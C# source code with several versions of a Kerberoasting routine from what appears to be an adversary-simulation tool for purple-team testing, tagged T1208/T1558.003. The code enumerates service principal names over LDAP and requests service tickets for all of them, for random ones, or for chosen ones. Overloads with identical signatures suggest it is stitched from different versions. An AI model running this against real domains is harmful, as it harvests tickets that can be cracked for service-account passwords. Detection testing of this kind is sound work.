public static void Kerberoasting(string log, int sleep = 0)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1208");
//logger.TimestampInfo(String.Format("Starting T1208 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
if (sleep > 0)
{
Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
}
try
{
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Kerberoasting(string log, int sleep)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1558.003");
if (sleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", sleep));
}
try
{
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Kerberoasting(int sleep = 0)
{
Console.WriteLine("[*] Starting Kerberoast attack from {0}", Environment.MachineName);
if (sleep > 0)
{
Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
}
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "");
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
}
public static void Kerberoasting(PlaybookTask playbook_task, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Logger logger = new Logger(currentPath + log);
logger.SimulationHeader("T1558.003");
List <String> servicePrincipalNames;
if (playbook_task.task_sleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", playbook_task.task_sleep));
}
try
{
logger.TimestampInfo(String.Format("Querying LDAP for Service Principal Names..."));
servicePrincipalNames = Ldap.GetSPNs();
logger.TimestampInfo(String.Format("Found {0} SPNs", servicePrincipalNames.Count));
if (playbook_task.variation == 1)
{
logger.TimestampInfo(String.Format("Requesting a service ticket for all the {0} identified SPNs", servicePrincipalNames.Count));
foreach (String spn in servicePrincipalNames)
{
SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (playbook_task.task_sleep > 0)
{
Thread.Sleep(playbook_task.task_sleep * 1000);
}
}
logger.SimulationFinished();
}
else if (playbook_task.variation == 2)
{
var random = new Random();
logger.TimestampInfo(String.Format("Requesting a service ticket for {0} random SPNs", playbook_task.user_target_total));
for (int i = 0; i < playbook_task.user_target_total; i++)
{
int index = random.Next(servicePrincipalNames.Count);
SharpRoast.GetDomainSPNTicket(servicePrincipalNames[index].Split('#')[0], servicePrincipalNames[index].Split('#')[1], "", "", logger);
if (playbook_task.task_sleep > 0)
{
Thread.Sleep(playbook_task.task_sleep * 1000);
}
}
logger.SimulationFinished();
}
else if (playbook_task.variation == 3)
{
var random = new Random();
logger.TimestampInfo(String.Format("Requesting a service ticket for {0} defined SPNs", playbook_task.user_targets.Length));
foreach (string spn in playbook_task.user_targets)
{
SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (playbook_task.task_sleep > 0)
{
Thread.Sleep(playbook_task.task_sleep * 1000);
}
}
logger.SimulationFinished();
}
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
